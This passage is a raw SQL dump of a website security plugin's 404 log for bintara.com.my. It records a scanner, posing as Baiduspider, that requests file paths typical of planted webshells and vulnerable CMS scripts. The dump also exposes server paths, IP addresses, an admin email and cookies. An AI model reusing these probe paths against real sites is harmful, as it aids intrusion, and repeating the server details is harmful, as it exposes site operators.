"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6X6OBT1onqG4TOWhlFnQAAARI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570674664.261\";s:12:\"REQUEST_TIME\";s:10:\"1570674664\";}}','notice','2019-10-10 02:31:06','2019-10-10 02:31:04',35064968,36880680,'https://bintara.com.my/lang/cn/system.php',1,0,'122.18.215.98'),(27819,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:65:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/include/code/mp.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:13:\"172.18.103.71\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=33fbf1b98d1fd09f83298870788e75a2\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"172.18.103.71\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:41:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/include/code/mp.php\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:20:\"/include/code/mp.php\";s:47:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:42:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:45:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6X3eBT1onqG4TOWhlFlwAAAQM\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/include/code/mp.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:20:\"/include/code/mp.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6X3eBT1onqG4TOWhlFlwAAAQM\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/include/code/mp.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:20:\"/include/code/mp.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6X3eBT1onqG4TOWhlFlwAAAQM\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/include/code/mp.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/include/code/mp.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6X3eBT1onqG4TOWhlFlwAAAQM\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.158.132.12\";s:11:\"REMOTE_PORT\";s:5:\"57905\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"https://bintara.com.my/include/code/mp.php\";s:10:\"SCRIPT_URL\";s:20:\"/include/code/mp.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6X3eBT1onqG4TOWhlFlwAAAQM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570674654.4344\";s:12:\"REQUEST_TIME\";s:10:\"1570674654\";}}','notice','2019-10-10 02:30:56','2019-10-10 02:30:54',35064912,36866320,'https://bintara.com.my/include/code/mp.php',1,0,'183.158.132.12'),(27818,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:59:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:27:\"/plus/mytag_js.php?aid=6022\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:14:\"138.102.198.93\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=71be0c1ba47f8db8366789e4790cc88d\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"138.102.198.93\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/plus/mytag_js.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:18:\"/plus/mytag_js.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6X0hypZvX7@gJ12mO-hAAAAIo\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/plus/mytag_js.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:18:\"/plus/mytag_js.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6X0hypZvX7@gJ12mO-hAAAAIo\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/plus/mytag_js.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/plus/mytag_js.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6X0hypZvX7@gJ12mO-hAAAAIo\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.158.132.12\";s:11:\"REMOTE_PORT\";s:5:\"57503\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/plus/mytag_js.php\";s:10:\"SCRIPT_URL\";s:18:\"/plus/mytag_js.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6X0hypZvX7@gJ12mO-hAAAAIo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570674642.8661\";s:12:\"REQUEST_TIME\";s:10:\"1570674642\";}}','notice','2019-10-10 02:30:44','2019-10-10 02:30:43',35055944,36851816,'https://bintara.com.my/plus/mytag_js.php?aid=6022',1,0,'138.102.198.93'),(27817,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:59:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/install/md5.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:11:\"98.6.24.120\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=a9c85a436005cb530241994887735f15\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:11:\"98.6.24.120\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/install/md5.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:16:\"/install/md5.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6XyeBT1onqG4TOWhlFfwAAAQ4\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/install/md5.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:16:\"/install/md5.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6XyeBT1onqG4TOWhlFfwAAAQ4\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/install/md5.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/install/md5.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6XyeBT1onqG4TOWhlFfwAAAQ4\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.158.132.12\";s:11:\"REMOTE_PORT\";s:5:\"57161\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/install/md5.php\";s:10:\"SCRIPT_URL\";s:16:\"/install/md5.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6XyeBT1onqG4TOWhlFfwAAAQ4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570674633.3053\";s:12:\"REQUEST_TIME\";s:10:\"1570674633\";}}','notice','2019-10-10 02:30:35','2019-10-10 02:30:33',35057768,36860856,'https://bintara.com.my/install/md5.php',1,0,'98.6.24.120'),(27816,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:59:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/install/m7lrv.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:13:\"89.176.17.153\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=debccb797ac72b55e4be5702856a6c4c\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"89.176.17.153\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/install/m7lrv.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:18:\"/install/m7lrv.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6XvuBT1onqG4TOWhlFdQAAAQg\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/install/m7lrv.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:18:\"/install/m7lrv.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6XvuBT1onqG4TOWhlFdQAAAQg\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/install/m7lrv.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/install/m7lrv.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6XvuBT1onqG4TOWhlFdQAAAQg\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.158.132.12\";s:11:\"REMOTE_PORT\";s:5:\"56789\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/install/m7lrv.php\";s:10:\"SCRIPT_URL\";s:18:\"/install/m7lrv.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6XvuBT1onqG4TOWhlFdQAAAQg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570674623.0978\";s:12:\"REQUEST_TIME\";s:10:\"1570674623\";}}','notice','2019-10-10 02:30:24','2019-10-10 02:30:23',35051168,36859472,'https://bintara.com.my/install/m7lrv.php',1,0,'89.176.17.153'),(27815,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:65:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:36:\"/include/helperss/filter.helpear.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:15:\"171.183.208.227\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=a5e2c3913082a237ad8f0893fd3718cb\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"171.183.208.227\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:41:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:58:\"https://bintara.com.my/include/helperss/filter.helpear.php\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:36:\"/include/helperss/filter.helpear.php\";s:47:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:42:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:45:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6XtH6YXSDJF91Gv2PyMQAAABY\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:58:\"https://bintara.com.my/include/helperss/filter.helpear.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:36:\"/include/helperss/filter.helpear.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6XtH6YXSDJF91Gv2PyMQAAABY\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:58:\"https://bintara.com.my/include/helperss/filter.helpear.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:36:\"/include/helperss/filter.helpear.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6XtH6YXSDJF91Gv2PyMQAAABY\";s:19:\"REDIRECT_SCRIPT_URI\";s:58:\"https://bintara.com.my/include/helperss/filter.helpear.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:36:\"/include/helperss/filter.helpear.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6XtH6YXSDJF91Gv2PyMQAAABY\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.158.132.12\";s:11:\"REMOTE_PORT\";s:5:\"56432\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:58:\"https://bintara.com.my/include/helperss/filter.helpear.php\";s:10:\"SCRIPT_URL\";s:36:\"/include/helperss/filter.helpear.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6XtH6YXSDJF91Gv2PyMQAAABY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570674612.5641\";s:12:\"REQUEST_TIME\";s:10:\"1570674612\";}}','notice','2019-10-10 02:30:14','2019-10-10 02:30:12',35064568,36869096,'https://bintara.com.my/include/helperss/filter.helpear.php',1,0,'171.183.208.227'),(27814,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:71:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:33:\"/include/data/fonts/uddatasql.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:12:\"128.5.13.199\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=92470e4b4dd0ffa6be3fee1f3d083709\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"128.5.13.199\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:41:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:50:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:55:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:55:\"https://bintara.com.my/include/data/fonts/uddatasql.php\";s:55:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:33:\"/include/data/fonts/uddatasql.php\";s:56:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:51:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:54:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6XoqyUrY9zjNB4MheuUQAAAYk\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:55:\"https://bintara.com.my/include/data/fonts/uddatasql.php\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:33:\"/include/data/fonts/uddatasql.php\";s:47:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:42:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\